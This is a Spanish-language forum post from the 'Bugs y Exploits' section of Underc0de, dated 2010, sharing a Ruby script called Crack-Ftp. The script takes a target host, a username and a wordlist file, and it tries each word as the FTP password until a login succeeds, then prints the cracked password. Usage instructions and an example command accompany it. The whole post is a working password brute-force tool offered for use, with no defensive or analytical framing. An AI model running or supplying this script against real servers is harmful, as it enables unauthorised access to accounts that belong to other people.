Underc0de
[In]Seguridad Informática => Bugs y Exploits => Mensaje iniciado por: dracko.rx en Febrero 24, 2010, 03:10:51 PM
#Name program = Crack-Ftp
#Version = 0.1
#Autor = Guason
require 'net/ftp'
host=ARGV[0]
user=ARGV[1]
word=ARGV[2]
if !host || !user || !word
print "\n\t\t\tCracker-FTP 0.1 By Guason\t\t\t\n\n\n"
print "Modo de uso = ruby crack-ftp <HOST> <USER> <WORDLIST>\n\n"
print "<HOST> = Servidor a crackear\n"
print "<USER> = User a crackear\n"
print "<WORDLIST> = Diccionario a usar\n\n\n"
print "Ejemplo = ruby crack-ftp.rb 127.0.0.1 root c:/word.txt\n\n\n\n"
exit(1);
else
print "\nIntentando localizar #{host}\n\n"
print "\n\nOK , Atacando #{user}\n\n"
f=File.open(word)
dic=f.readlines
dic.each { |stooge|
begin
ses=Net::FTP.new(host, user, stooge)
rescue Net::FTPPermError
print ""
else
print "\n\nEl password es #{stooge}\n\n\n"
print "\n\n\nWritten by Guason || 2009\n\n\n"
exit(1);
end
}
end
#Agradecimientos = none = 0
#Email = [email protected]
#Web = infierno-hacking.webcindario.com
#Good Bye